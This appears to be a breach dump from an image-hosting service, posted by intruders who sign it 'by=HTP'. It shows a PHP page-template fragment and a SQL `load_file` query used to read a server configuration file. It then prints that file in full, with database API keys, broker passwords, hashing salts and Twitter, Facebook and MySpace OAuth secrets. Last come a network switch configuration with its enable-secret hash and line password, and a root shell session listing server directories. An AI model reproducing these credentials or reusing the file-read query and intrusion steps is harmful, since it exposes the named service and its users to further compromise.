<tr>
<td valign="top">
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<td valign="top" st
yle="padding-top:5px;">....................................................
.........................................................................</
td>
<td>
<img src="<?= i
url('pic_20.gif') ?>" width="28" height="28" alt=""/>
</td>
</tr>
</table>
</td>
</tr>
<!-- friends -->
<tr>
<td>
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<td>
<img src="<?= i
url('pic_83.gif') ?>" width="31" height="32" alt=""/>
</td>
<td class="zag3"><?
= $user ?>'s friends</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<?php
include('friends.inc');
?>
</td>
</tr>
<?php
if (PROFILE_COMMENTS_ENABLED)
{
?>
<!-- comments -->
<!-- separator -->
<tr>
<td valign="top">
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<td valign="top" st
yle="padding-top:5px;">....................................................
.........................................................................</
td>
<td>
<img src="<?= i
url('pic_20.gif') ?>" width="28" height="28" alt=""/>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<td>
<img src="<?= i
url('pic_83.gif') ?>" width="31" height="32" alt=""/>
</td>
<td class="zag3"><?
= $user ?>'s friends comments</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<div id="commentsinfo_conte
nt_loading" style="display: none;"><img src="<?= iurl('loading.gif') ?>" al
t="Loading" title="Loading" width="56" height="16"/></div>
<div id="commentsinfo_conte
nt">
<div id="mnav" style="p
adding-left: 37px;">
<div id="mnavinfo"
style="padding-bottom:10px;"></div>
<div id="mnavbar"
style="padding-top:2px;padding-bottom:10px;"></div>
</div>
<div id="mhascontent">
<table border="0" w
idth="540">
<?php
for ($i = 0; $i
< COMMENTS_ROWS_PER_PAGE; $i++)
{
echo "<tr i
d=\"mr_". $i ."\">\n";
for ($j = 0
; $j < COMMENTS_COLS_PER_PAGE; $j++)
{
echo "<
td align=\"left\" valign=\"top\" style=\"background-repeat:no-repeat; heigh
t: 93px;\">";
$id = $
i * COMMENTS_COLS_PER_PAGE + $j;
echo "<
div id=\"mh_" . $id . "\" ></div>\n";
echo "<
/td>";
}
echo "</tr>
\n";
}
?>
</table>
<div id="mnocontent"
style="display: none;">
<br/><span class
="nm">No comments found</span><br/>
</div>
<!--add form-->
<div id="mmore" sty
le="padding-top:7px;">
<table border="
0">
<tr>
<td>
<?php
in
clude("comments_form.php");
?>
</td>
</tr>
</table>
</div>
</div>
<div id="mcontentdata"
style="display: none;">
<?php
include("comments.p
hp");
?>
</div>
</div>
</td>
</tr>
<?php
}
?>
<!-- separator -->
<tr>
<td class="bordera"> </td>
</tr>
</table>
<!--center end-->
</td>
<td>
<img src="<?= iurl('1pix.gif') ?>" width="49" h
eight="1" alt=""/>
</td>
<td style="vertical-align:top;">
<!-- tags -->
<div id="grouptags" class="dialogbox">
<div id="taginfo_on" class="header">MY TA
GS</div>
<div id="taginfo_content" style="text-ali
gn: left; vertical-align: top;">
<div id="tnav" style="padding-right: 1
5px; padding-left: 15px;">
<div id="tnavbar"></div>
</div>
<div id="tsort" style="display: none;
padding-bottom: 15px;padding-left: 15px;">
Sort tags by:
<div id="tags.sort.usage.on" style="
display: none;"><b>usage</b></div>
<div id="tags.sort.usage.off" style=
"display: none;"><a class="ser" href="javascript:void(0)" onclick="javascri
pt:sort_tags('c');return false;">usage</a></div> /
<div id="tags.sort.name.on" style="d
isplay: none;"><b>name</b></div>
<div id="tags.sort.name.off" style="
display: none;"><a class="ser" href="javascript:void(0)" onclick="javascrip
t:sort_tags('a');return false;">name</a></div>
</div>
<div id="thascontent" style="padding-l
eft: 15px; padding-bottom: 15px">
</div>
<div id="tnocontent" style="display: n
one; padding-bottom: 15px">
<br/>
<span class="nmr">user defined no
tags</span>
<br/>
</div>
<div id="taginfo_content_loading" styl
e="display: none;"><img src="<?= iurl('loading.gif') ?>" alt="Loading" titl
e="Loading" width="56" height="16"/></div>
<div id="tcontentdata" style="display:
none;">
<?php
include("tags.php");
?>
</div>
</div>
</div>
<div style="height: 15px;"></div>
<!-- calendar -->
<div id="groupcalendar" class="dialogbox">
<div id="calendar_on" class="header">CA
LENDAR</div>
<div style="text-align: left; vertical-a
lign: top;">
<div id="calendar_content" style="pa
dding-left: 8px; padding-bottom: 15px">
</div>
<div id="ccontentdata" style="displa
y:none">
<?php
include("calendar.php");
?>
</div>
<div id="calendar_content_loading" s
tyle="display: none;"><img src="<?= iurl('loading.gif') ?>" alt="Loading" t
itle="Loading" width="56" height="16"/></div>
</div>
</div>
<?php
if (SHOW_NOTABLE)
{
?>
<div style="height: 15px;"></div>
<!-- related profiles -->
<div id="grouprelated" class="dialogbox">
<div id="related_on" class="header">P
OPULAR USERS</div>
<div style="text-align: left; vertical
-align: top;">
<div id="related_content" style="p
adding-left: 15px; padding-bottom: 15px">
</div>
<div id="related_content_data" sty
le="display:none">
</div>
<div id="related_content_loading"
style="display: none;"><img src="<?= iurl('loading.gif') ?>" alt="Loading"
title="Loading" width="56" height="16"/></div>
<script type="text/javascript">dis
play_notable()</script>
</div>
</div>
<?php
}
?>
</td><!--stolbec-right end-->
<td><!--indent right--><img src="<?= iurl('1pix.gif
') ?>" width="6" height="1" alt=""/></td>
</tr>
</table>
</td>
</tr>
<!-- end content -->
</table>
<!-- Start Google Analytics Tag -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.prot
ocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHos
t + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-6232220-1");
pageTracker._initData();
pageTracker._setDomainName(".imageshack.us");
pageTracker._trackPageview();
</script>
<script type="text/javascript">pageTracker._setVar('Profile
Pages');</script>
<!-- End Google Analytics tag -->
<br>
<!-- Start Quantcast tag -->
<script type="text/javascript">
_qoptions={
qacct:"p-65DrxcUXjcWq6",
labels:"ProfilePages"
};
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></
script>
<noscript>
<a href="http://www.quantcast.com/p-65DrxcUXjcWq6" target="_blank"><img src
="http://pixel.quantserve.com/pixel/p-65DrxcUXjcWq6.gif?labels=ProfilePages
" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><
/a>
</noscript>
<!-- End Quantcast tag -->
<?php
echo "<div style='width:1000px; margin:0 auto;'><div>"; // For compatib
ility with the new footer
$smarty->assign('footer', '<script type="text/javascript" src="/scripts/b
lue/login.js"></script>');
$smarty->display('is:common/footer.tpl');
> SELECT load_file("/home/image/www/config.inc");
<?php
// current server name
$SERVER_NAME = '';
// IFS
$IFS_MASTER_NODE = '208.94.2.13';
if(is_file('myhostname.DONOTDELETE'))
{
$handle = @fopen('myhostname.DONOTDELETE', 'r');
$buf = '';
while ($data = fgets($handle, 100))
$buf .= $data;
fclose($handle);
$SHORT_SERVER_NAME = trim($buf);
$SERVER_NAME = $SHORT_SERVER_NAME . '.imageshack.us';
}
else
{
$SERVER_NAME = $_SERVER["SERVER_NAME"];
$SHORT_SERVER_NAME = $SERVER_NAME;
}
// Deployment on imageshack.us
$APPLICATION_URI = "/flashupload";
// Cookie
if (isset($_GET['cookie']))
$my_cookie = $_GET['cookie'];
else
if (isset($_POST['cookie']))
$my_cookie = $_POST['cookie'];
else
if (isset($_COOKIE["myimages"]))
$my_cookie=$_COOKIE["myimages"];
else
$my_cookie = null;
if (@$_REQUEST['nocookie'])
$my_cookie = null;
$DATA_DIRECTORY = dirname(__FILE__);
$DATA_URI = '/';
$REDIR_DIRECTORY = '/home/image/www/redir';
$ICONVERT_TMP_DIR = '/tmp';
$ICONVERT_CONVERT_CMD = '/usr/bin/convert';
// open tags field in index.php/v_images.php automatically or by clicking o
n link
define('AUTO_OPEN_TAGS', true);
// open email field in index.php automatically or by clicking on link
define('AUTO_OPEN_EMAIL', true);
// Number of tags to display in one page
define('TAGS_PER_PAGE', 20);
// Number of images rows and cols to display in one page (homepage)
define('IMAGE_ROWS_PER_PAGE', 6);
define('IMAGE_COLS_PER_PAGE', 7);
define('IMAGE_CACHED_PAGES', 2);
// use thumbnail server
define('USE_THUMBS_SERVER', true);
// update only if its calling by the image
define('CREATE_XML', true);
// timeout (sec) to wait for DB API results
define('API_TIMEOUT', 30);
$COOKIE_RESOLVER_URL="http://worf.imageshack.us/accounts1/";
/*
* Time to update XML data file (username update), seconds
* Current value: One week
* @see my.php
*/
define('XML_DATA_REFRESH_RATE', 7 * 24 * 60 * 60);
//riker,worf,troy,kerpal,free
$API_HOSTS = array('img660','img727','img728','img974','img976','img679');
// database
$master_db_api_hostname = "dbm1.imageshack.us";
$master_db_api_path = "/db_api/tagsdb.php";
$master_db_api_port = 80;
$master_db_api_key = 'HDF63*D:nF';
$slave_db_api_hostname = in_array($SHORT_SERVER_NAME, $API_HOS
TS) ? "localhost" : "dbs.imageshack.us";
$slave_db_api_path = "/db_api/tagsdb.php";
$slave_db_api_port = 80;
$slave_db_api_key = 'HDF63*D:nF';
$master_imageapi_api_hostname = "dbm1.imageshack.us";
$master_imageapi_api_path = "/db_api/imageapi.php";
$master_imageapi_api_port = 80;
$master_imageapi_api_key = 'HDF63*D:nF';
$slave_imageapi_api_hostname = in_array($SHORT_SERVER_NAME, $API_HOS
TS) ? "localhost" : "dbs.imageshack.us";
$slave_imageapi_api_path = "/db_api/imageapi.php";
$slave_imageapi_api_port = 80;
$slave_imageapi_api_key = 'HDF63*D:nF';
$master_slideshowapi_api_hostname = "dbm1.imageshack.us";
$master_slideshowapi_api_path = "/db_api/slideshowsdb.php";
$master_slideshowapi_api_port = 80;
$master_slideshowapi_api_key = 'HDF63*D:nF';
$slave_slideshowapi_api_hostname = in_array($SHORT_SERVER_NAME, $API_HOS
TS) ? "localhost" : "dbs.imageshack.us";
$slave_slideshowapi_api_path = "/db_api/slideshowsdb.php";
$slave_slideshowapi_api_port = 80;
$slave_slideshowapi_api_key = 'HDF63*D:nF';
$master_publicapi_api_hostname = "dbm1.imageshack.us";
$master_publicapi_api_path = "/db_api/publicapi.php";
$master_publicapi_api_port = 80;
$master_publicapi_api_key = 'HDF63*D:nF';
$slave_publicapi_api_hostname = in_array($SHORT_SERVER_NAME, $API_HO
STS) ? "localhost" : "dbs.imageshack.us";
$slave_publicapi_api_path = "/db_api/publicapi.php";
$slave_publicapi_api_port = 80;
$slave_publicapi_api_key = 'HDF63*D:nF';
$master_videoapi_api_hostname = "dbm1.imageshack.us";
$master_videoapi_api_path = "/db_api/videoapi.php";
$master_videoapi_api_port = 80;
$master_videoapi_api_key = 'HDF63*D:nF';
$slave_videoapi_api_hostname = "dbs.imageshack.us";
$slave_videoapi_api_path = "/db_api/videoapi.php";
$slave_videoapi_api_port = 80;
$slave_videoapi_api_key = 'HDF63*D:nF';
$master_notable_api_hostname = "dbm1.imageshack.us";
$master_notable_api_path = "/db_api/notableapi.php";
$master_notable_api_port = 80;
$master_notable_api_key = 'HDF63*D:nF';
$slave_notable_api_hostname = "dbs.imageshack.us";
$slave_notable_api_path = "/db_api/notableapi.php";
$slave_notable_api_port = 80;
$slave_notable_api_key = 'HDF63*D:nF';
$master_othersites_api_hostname = "dbm1.imageshack.us";
$master_othersites_api_path = "/db_api/othersitesapi.php";
$master_othersites_api_port = 80;
$master_othersites_api_key = 'HDF63*D:nF';
$slave_othersites_api_hostname = in_array($SHORT_SERVER_NAME, $API_HOST
S) ? "localhost" : "dbs.imageshack.us";
$slave_othersites_api_path = "/db_api/othersitesapi.php";
$slave_othersites_api_port = 80;
$slave_othersites_api_key = 'HDF63*D:nF';
$master_account_api_hostname = "dbm1.imageshack.us";
$master_account_api_path = "/db_api/accountapi.php";
$master_account_api_port = 80;
$master_account_api_key = 'HDF63*D:nF';
$slave_account_api_hostname = in_array($SHORT_SERVER_NAME, $API_HOSTS)
? "localhost" : "dbs.imageshack.us";
$slave_account_api_path = "/db_api/accountapi.php";
$slave_account_api_port = 80;
$slave_account_api_key = 'HDF63*D:nF';
$master_timeline_api_hostname = "dbm1.imageshack.us";
$master_timeline_api_path = "/db_api/timelineapi.php";
$master_timeline_api_port = 80;
$master_timeline_api_key = 'HDF63*D:nF';
$slave_timeline_api_hostname = in_array($SHORT_SERVER_NAME, $API_HOSTS)
? "localhost" : "dbs.imageshack.us";
$slave_timeline_api_path = "/db_api/timelineapi.php";
$slave_timeline_api_port = 80;
$slave_timeline_api_key = 'HDF63*D:nF';
/**
* Indicates if image cache (/disk3) is enabled and new files should be put
to cache
*/
define('ENABLE_IMAGE_CACHE', false);
//Hbase on?
define('HBASE_UPLOAD', false);
//show rotation buttons if true
define('ENABLE_ROTATION', true);
//show glittery button if true
define('ENABLE_GLITTER', true);
define('GLITTER_COUNT_MASKS',10);
//glittery ui table config
define('GLITTER_COUNT_COLS',5);
//glittery file size limit in kb's
define('GLITTER_FSIZE_LIMIT',1000);
// relative! dir path
define('GLITTER_MASK_PATH','images');
/**
* Create or not thumbnail information bar
* @see edit_rotate.php
*/
define('THUMBNAIL_CREATE_BAR', true);
/**
* Display or not image comments
* @see my.php
*/
define('IMAGE_COMMENTS_ENABLED', true);
/**
* ID's
* @see camerabuy.php
*/
define("Access_Key_ID", "12MJ51PYW8J9E7SX6882");
define("Associate_tag", "image0d-20");
// Only one time from EXIF_UPDATE_RATE EXIF information should be updated,
e.g.
// probability for EXIF_UPDATE_RATE == 10 is 1/10
define('EXIF_UPDATE_RATE', 10);
define('SMTP_SERVER_NAME', 'mailout.imageshack.us');
// enable search by tag on main page (index.php)
define('TAG_SEARCH_ENABLED', true);
// Number of rows of tagged images to display in one page
define('TAGGED_ROWS_PER_PAGE', 5);
// Number of cols of tagged images to display in one page
define('TAGGED_COLS_PER_PAGE', 8);
// Number of tagged images pages to fetch
define('TAGGED_PAGES', 2);
$PROFILE_HOSTS = array("img601.imageshack.us", "img603.
imageshack.us");
$tagged_api_hostname = in_array($SERVER_NAME, $PROFILE_HOSTS)
? "localhost" : "dbs.imageshack.us";
$tagged_api_path = "/db_api/publicapi.php";
$tagged_api_port = 80;
$tagged_api_key = 'HDF63*D:nF';
/**
* Controls if flash multifile upload is enabled
*/
define('MULTI_UPLOAD_ENABLED', true);
// Varnish Controls
define("ENABLE_RELATED_IMAGES", true);
define("ENABLE_VARNISH", false);
define("ENABLE_VARNISH_REL_Q", false);
define("RELATED_CACHE_TTL", 300);
define("RELATED_IMAGE_VERSION", 1);
$ACCEPTED_CONTENT_TYPES = array(
"image/jpeg",
"image/png",
"image/x-png",
"image/gif",
"image/bmp",
"image/tiff",
"video/x-flv",
"application/pdf",
"video/mp4",
"video/x-ms-wmv",
"video/3gpp",
"video/avi",
"video/quicktime",
"video/x-matroska"
);
$ACCEPTED_FILE_EXTENSIONS = array(
"ico" => "image/x-icon",
"jpg" => "image/jpeg",
"jpeg" => "image/jpeg",
"png" => "image/png",
"gif" => "image/gif",
"bmp" => "image/bmp",
"tiff" => "image/tiff",
"tif" => "image/tiff",
"flv" => "video/x-flv",
"pdf" => "application/pdf",
"mp4" => "video/mp4",
"wmv" => "video/x-ms-wmv",
"3gp" => "video/3gpp",
"avi" => "video/avi",
"mov" => "video/quicktime",
"mkv" => "video/x-matroska"
);
/**
* The difference between this array and previous one is :
* ALLOWED_FILE_EXTENSIONS is used by lock_file and lists all extensions th
at ImageShack could store
* while ACCEPTED_FILE_EXTENSIONS lists all extension that could be uploade
d (and maybe converted then)
*/
$ALLOWED_FILE_EXTENSIONS = array
(
"ico",
"jpg",
"jpeg",
"png",
"gif",
"bmp",
"tiff",
"tif",
//"swf",
"flv",
"pdf",
"mp4"
);
$VIDEO_FILE_EXTENSIONS = array
(
"mp4",
"wmv",
"3gp",
"avi",
"mov",
"mkv"
);
/**
* Electra settings. Used by pdfboo, snapshot and others
*/
$ELECTRA_BROKER_HOST = 'msgbroker.imageshack.us';
$ELECTRA_EXCHANGE = 'jobs';
$ELECTRA_BROKER_PORT = 5672;
$ELECTRA_MEMCACHED_PORT = 11211;
$ELECTRA_USER = 'electra';
$ELECTRA_PASSWORD = 'ele67A';
$ELECTRA_PDF_QUEUE = 'pdfbook';
/**
* Web snapshot generation
*/
define('WEB_SNAPSHOT_ENABLED', true);
$ELECTRA_SNAPSHOT_QUEUE = 'snapshot';
/**
* Salt string used to make a hash in yfrog registration URLs
*/
define('YFROG_HASH_SALT_STRING', 'Wall St. creeps forward after huge rally
');
/**
* Name of cookie used to identify default action to perform in register_im
age.php
* @see register_image.php
*/
define('YFROG_LINKING_COOKIE', 'yf');
define('GALLERY_SAVE_SECRET','What I used to think was me, is just a fading
memory, I looked him right in the eye and said goodbye');
/**
* Parameter used for XML file updates to confirm that request come from us
* @see setxmlproperties.php
*/
define('XML_UPDATE_AUTH_KEY', '19AdWfg$t');
define('VIDEO_STATUS_UPDATE_PASSWORD', '1m7rgf42s1q');
$VIDEO_UPLOAD_ENABLED = true;
define('DEBUG_DIRECT_HANDLER', false);
define('ENABLE_PRV_NXT', true);
define('YFROG_COOKIE', 'ytoken');
define('YFROG_AUTH_SALT', 'Obama reveals tough executive pay limits ');
define('YFROG_AUTH_IV', 'HXZvoGF+OEk=');
define('TWITTER_OAUTH_CONSUMER_KEY', '1HJtPj9FvYekFnbW6ELftA');
define('TWITTER_OAUTH_SECRET_KEY', 'w56HRHYzgjRv18XTx7ADfz5E4tNpg7Nqw2nzDWg
6rA');
define('USE_OAUTH', !@$oldauth);
define('MAX_UPLOAD_RETRIES', 3);
define('COMMENTS_DEV_KEY', '0239FJST66f558faf53a0d35e8d8b5edb545423d');
define('WEBCAM_ENABLED', false);
// MYSPACE_OAUTH_CONSUMER_KEY - this value was taken from application's pre
ferences
define('MYSPACE_OAUTH_CONSUMER_KEY', 'ce4b1762c21f4b1aba746e029617c032');
define('MYSPACE_OAUTH_SECRET_KEY', 'a0664ce3816747bb81bea66a46ee2793b4685c3
a04344c4883f744ace943ef00');
define('MYSPACE_OAUTH_CALLBACK', 'http://yfrog.com/myspace_callback.php');
define("YFROG_USER_PREFIX", "yfrog~");
define('FACEBOOK_API_KEY', '3ba9e188764161fecd20be1b8fac79aa');
define('FACEBOOK_API_SECRET', 'c6eb83a01511006e452b2a869a3823e4');
define('OAUTH_REQUEST_TIMEOUT', 10);
define('DEFAULT_VIDEO_ICON', 'http://imageshack.us/common/images/videoicon.
gif');
define('DEFAULT_VIDEO_ICON_SIZE', '394');
define('BEANSTALK_UPLOAD_ENABLE', false);
define('BEANSTALK_UPLOAD_HOST', 'uploadq.imageshack.us');
define('BEANSTALK_UPLOAD_PORT', 11300);
define('BEANSTALK_UPLOAD_PRI', 10000);
define('BEANSTALK_UPLOAD_DELAY', 0);
define('BEANSTALK_UPLOAD_TTR', 60);
define('BEANSTALK_UPLOAD_TUBE', 'upload.central');
define('CACHE_BACKEND_HOST', 'img873');
define('CACHE_BACKEND_PORT', 11311);
define('IFE_DEBUG_ENABLED', true);
define('IFE_DEBUG_LOG', '/export/hda3/log/httpd/ife_debug.log');
define('LARGE_HOLD_CACHE_1_HOST', 'img873.imageshack.us');
define('LARGE_HOLD_CACHE_1_PORT', '11311');
define('LARGE_HOLD_CACHE_2_HOST', 'img874.imageshack.us');
define('LARGE_HOLD_CACHE_2_PORT', '11311');
// VIP will no longer exits
//define('MEMCACHE_VIP_HOST', 'memcache-thermos-vip0');
//define('MEMCACHE_VIP_PORT', '26300');
// MEMCACHE POOL DEF
// host:port:weight
define('MEMCACHED_POOL', "img873:11311:34,img874:11311:33,gsaa1:11311:33");
// Skypath dev keys
define("SKYPATH_IOS_KEY", "79HIJPQS4d94d2a3e201528d9512ae6e4f2a5705");
define("SKYPATH_MACOS_KEY", "568FGJPRc31aac031dfe2cf07daca4d42c005399");
define("SKYPATH_ANDROID_KEY", "4ADHNPSU51ac62ca298a67c4875d2cdee6802546");
define("SKYPATH_WINDOWS_KEY", "568FGJPRc31aac031dfe2cf07daca4d42c005399");
> exit
Priority 2: Routers
<jacklevin> yes, I am pretty sure you did not get there
>-------------------------------------------------------------------------------
sw1.q.1655.sj
Using 2039 out of 32768 bytes
!
version 12.0
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname sw1.q.1655.sj
!
enable secret 5 $1$KYn3$RVuLboZmN27kmYOYTYS9f/
!
!
!
!
!
!
no spanning-tree vlan 1
ip subnet-zero
!
!
!
interface FastEthernet0/1
!
interface FastEthernet0/2
!
interface FastEthernet0/3
!
interface FastEthernet0/4
!
interface FastEthernet0/5
!
interface FastEthernet0/6
!
interface FastEthernet0/7
!
interface FastEthernet0/8
!
interface FastEthernet0/9
!
interface FastEthernet0/10
!
interface FastEthernet0/11
!
interface FastEthernet0/12
!
interface FastEthernet0/13
!
interface FastEthernet0/14
!
interface FastEthernet0/15
!
interface FastEthernet0/16
!
interface FastEthernet0/17
!
interface FastEthernet0/18
!
interface FastEthernet0/19
!
interface FastEthernet0/20
!
interface FastEthernet0/21
!
interface FastEthernet0/22
!
interface FastEthernet0/23
!
interface FastEthernet0/24
!
interface FastEthernet0/25
!
interface FastEthernet0/26
!
interface FastEthernet0/27
!
interface FastEthernet0/28
!
interface FastEthernet0/29
!
interface FastEthernet0/30
!
interface FastEthernet0/31
!
interface FastEthernet0/32
!
interface FastEthernet0/33
!
interface FastEthernet0/34
!
interface FastEthernet0/35
!
interface FastEthernet0/36
!
interface FastEthernet0/37
!
interface FastEthernet0/38
!
interface FastEthernet0/39
!
interface FastEthernet0/40
!
interface FastEthernet0/41
!
interface FastEthernet0/42
!
interface FastEthernet0/43
!
interface FastEthernet0/44
!
interface FastEthernet0/45
!
interface FastEthernet0/46
!
interface FastEthernet0/47
!
interface FastEthernet0/48
!
interface GigabitEthernet0/1
description router1.sj-ge-3-1
no negotiation auto
!
interface GigabitEthernet0/2
description router2.sj-ge-3-1
no negotiation auto
!
interface VLAN1
ip address 208.94.3.69 255.255.255.192
no ip directed-broadcast
no ip route-cache
!
!
line con 0
transport input none
stopbits 1
line vty 0 4
exec-timeout 60 0
password vfpkthis
login
line vty 5 15
login
!
end
##
>-------------------------------------------------------------------------------
Priority 1: Management servers (DNS, SNMP signaling, etc)
> root@img997.imageshack.us:~# export owned=gslb.imageshack.us
root@img997.imageshack.us:~# export by=HTP
root@img997.imageshack.us:~# export PS1='# '
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux img997.imageshack.us 2.6.20-1.2320.fc5 #1 SMP Tue Jun 12 18:50:49 EDT
2007 x86_64 x86_64 x86_64 GNU/Linux
# w
19:21:25 up 82 days, 7 min, 1 user, load average: 1.42, 1.15, 1.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
edwin pts/0 img1000.imagesha 12Jun12 18days 2.25s 2.22s screen -x
maste
# ls -alt /home/image/
total 7500
drwxr-xr-x 6 image users 36864 Aug 30 08:03 www
drwxrwxrwx 2 root root 20480 Aug 30 06:00 hcr
drwxr-xr-x 6 image image 7553024 Jan 1 2012 .
-rwxr-xr-x 1 root root 6060 Jan 1 2012 control_dns.sh
drwxr-xr-x 32 root root 4096 Nov 14 2011 ..
-rw-r--r-- 1 root root 1705 Nov 2 2011 curlchecker.php
lrwxrwxrwx 1 root root 39 Apr 21 2011 update_codes.sh -> /home/imag
e/svn/ops/dns/update_codes.sh
lrwxrwxrwx 1 root root 39 Apr 21 2011 curlchecker.php.orig -> /home
/image/svn/ops/dns/curlchecker.php
lrwxrwxrwx 1 root root 38 Apr 21 2011 control_dns.sh.orig -> /home/
image/svn/ops/dns/control_dns.sh
drwxrwxrwx 2 root root 12288 Apr 6 2011 outputs
lrwxrwxrwx 1 root root 36 Feb 13 2011 dnsmaker.php -> /home/image/s
vn/ops/dns/dnsmaker.php
-rw------- 1 image image 5317 Mar 13 2010 .bash_history
drwxr-xr-x 7 image image 4096 May 7 2009 svn
-rw------- 1 image image 5393 Mar 3 2009 .viminfo
-rw------- 1 image image 275 Jun 23 2008 .mysql_history
# ls -alt /home/image/www
total 12108
-rw-r--r-- 1 root root 471799 Aug 30 08:21 kwh.txt
-rw-r--r-- 1 root root 0 Aug 30 08:20 bigtemp.txt
-rw-r--r-- 1 root root 298 Aug 30 08:20 scounter.txt
-rw-r--r-- 1 root root 0 Aug 30 08:20 oncall.person
-rw-r--r-- 1 root root 497 Aug 30 08:20 reasons.0
-rw-r--r-- 1 root root 54 Aug 30 08:20 reasons.1
-rw-r--r-- 1 root root 7122 Aug 30 08:20 upload.weights
-rw-r--r-- 1 root root 2 Aug 30 08:20 capacity.txt
-rw-r--r-- 1 root root 227 Aug 30 08:20 indns.txt
-rw-r--r-- 1 root root 7 Aug 30 08:20 iowait.txt
-rw-r--r-- 1 root root 0 Aug 30 08:20 outof-lvm.txt
-rw-r--r-- 1 root root 7 Aug 30 08:20 outofspace-critical.txt
-rw-r--r-- 1 root root 0 Aug 30 08:20 overheat.txt
-rw-r--r-- 1 root root 183 Aug 30 08:20 servers.disabled
-rw-r--r-- 1 root root 15 Aug 30 08:20 serversdown.txt
-rw-r--r-- 1 root root 6 Aug 30 08:20 upload_weight.file
-rw-r--r-- 1 root root 2273055 Aug 30 08:03 temp.data
-rw-r--r-- 1 root root 685317 Aug 30 08:03 temp.datacenter.data
-rw-r--r-- 1 root root 6410 Aug 30 08:03 maclist.txt
-rw-r--r-- 1 root root 5 Aug 30 08:03 percent403.txt
-rw-r--r-- 1 root root 5 Aug 30 08:03 percent404.txt
drwxr-xr-x 6 image users 36864 Aug 30 08:03 .
-rw-r--r-- 1 root root 6415 Aug 30 08:03 hostnames.txt
-rw-r--r-- 1 root root 5103 Aug 30 08:03 hostnames2.txt
-rw-r--r-- 1 root root 12954 Aug 30 08:03 idiplist.txt
-rw-r--r-- 1 root root 0 Aug 30 06:00 switch-ip-queries
-rw-r--r-- 1 image image 47001 Aug 24 11:45 roles.pickle
-rw-r--r-- 1 root root 1678 Jan 2 2012 auths.php
drwxr-xr-x 6 image image 7553024 Jan 1 2012 ..
drwxr-xr-x 2 image image 12288 Dec 19 2011 dev
-rwxrwxrwx 1 root root 0 Dec 9 2011 auto.reboots
-rw-r--r-- 1 root root 1502 Nov 10 2011 hdMysql.php
-rw-r--r-- 1 root root 18 Nov 4 2011 oncall.names
-rw-r--r-- 1 root root 1499 Oct 25 2011 hdMysql.php.orig
drwxrwxrwx 2 root root 4096 Oct 20 2011 health
-rw-r--r-- 1 root root 26 Oct 1 2011 test.php
-rw-r--r-- 1 root root 210 Sep 16 2011 fe.weights
-rw-r--r-- 1 root root 365 Sep 16 2011 yf.weights
-rw-r--r-- 1 root root 17656 Sep 7 2011 ai.php
-rw-r--r-- 1 root root 196 Jun 16 2011 index.php
-rw-r--r-- 1 root root 5295 Jun 9 2011 names.txt
-rw-r--r-- 1 root root 1114 Jun 9 2011 names1.txt
-rwxrwxrwx 1 root root 609 May 18 2011 oncall.schedule
-rw-r--r-- 1 root root 111 Apr 21 2011 oncall.numbers
-rw-r--r-- 1 root root 0 Apr 21 2011 queries
-rw-r--r-- 1 root root 0 Apr 21 2011 recent_ad_hits.txt
drwxr-xr-x 2 root root 4096 Feb 23 2011 milestones
-rw-r--r-- 1 root root 187 Dec 30 2010 temp.php
-rw-r--r-- 1 root root 308 Dec 15 2010 qr.php
-rw-r--r-- 1 root root 0 Dec 2 2010 file_counts
drwxr-xr-x 2 root root 1069056 Oct 12 2010 csv
-rwxrwxrwx 1 root root 278 Sep 26 2010 oncall.sh
-rwxrwxrwx 1 root root 89 Sep 1 2010 make_name.sh
-rwxrwxrwx 1 root root 163 Sep 1 2010 gen_oncall.sh
-rwxrwxrwx 1 root root 6412 Sep 1 2010 datecalc.sh
-rw-r--r-- 1 root root 7 Jan 11 2008 myhostname.DONOTDELETE
# ls -alt /home/image/www/dev/
total 1108
-rw-r--r-- 1 root root 26190 Aug 30 08:21 POWERPAGE.htm
-rw-r--r-- 1 root root 56 Aug 30 08:20 favorites.count
drwxr-xr-x 6 image users 36864 Aug 30 08:03 ..
-rwxr-xr-x 1 root root 265783 Aug 30 04:02 toggle.david
-rwxrwxrwx 1 image image 265783 Aug 23 18:46 toggle.log
drwxr-xr-x 2 image image 12288 Dec 19 2011 .
-rw-r--r-- 1 root root 2400 Dec 19 2011 rebootapi.php
-rwxr-xr-x 1 root root 26120 Nov 2 2011 switch_mac_map
-rwxr-xr-x 1 root root 8689 Oct 20 2011 import.php
-rwxr-xr-x 1 root root 8689 Oct 20 2011 import.php.orig
-rw-r--r-- 1 root root 111 Oct 20 2011 dnsConnect.php
-rw-r--r-- 1 root root 111 Oct 20 2011 dnsConnect.php.orig
-rw-r--r-- 1 root root 2658 Jul 18 2011 reboot_log.php
-rwxrwxrwx 1 root root 4327 Jun 2 2011 favorites.txt
-rw-r--r-- 1 root root 1059 May 5 2011 ba
-rwxrwxrwx 1 image image 2502 Apr 23 2011 toggleMysql.php
-rw-r--r-- 1 root root 2393 Apr 23 2011 pasthd.php
-rw-r--r-- 1 root root 70 Apr 21 2011 dns_table.php
-rwxrwxrwx 1 root root 11890 Apr 19 2011 health_functions.php
-rwxrwxrwx 1 image image 3230 Apr 13 2011 bookmarks.file
-rwxrwxrwx 1 image image 1655 Feb 28 2011 devstyle.css
-rwxrwxrwx 1 root root 3419 Nov 22 2010 explains.txt
-rw-r--r-- 1 root root 749 Oct 18 2010 youtube.php
-rw-r--r-- 1 root root 950 May 11 2010 queries.php
-rw-r--r-- 1 image image 415 May 11 2010 bookmarks.php
-rwxrwxrwx 1 root root 2728 Apr 30 2010 correl.php
-rw-r--r-- 1 root root 72174 Feb 13 2010 jquery-1.4.2.min.js
-rw-r--r-- 1 root root 3617 Apr 13 2008 rebootfinder.php
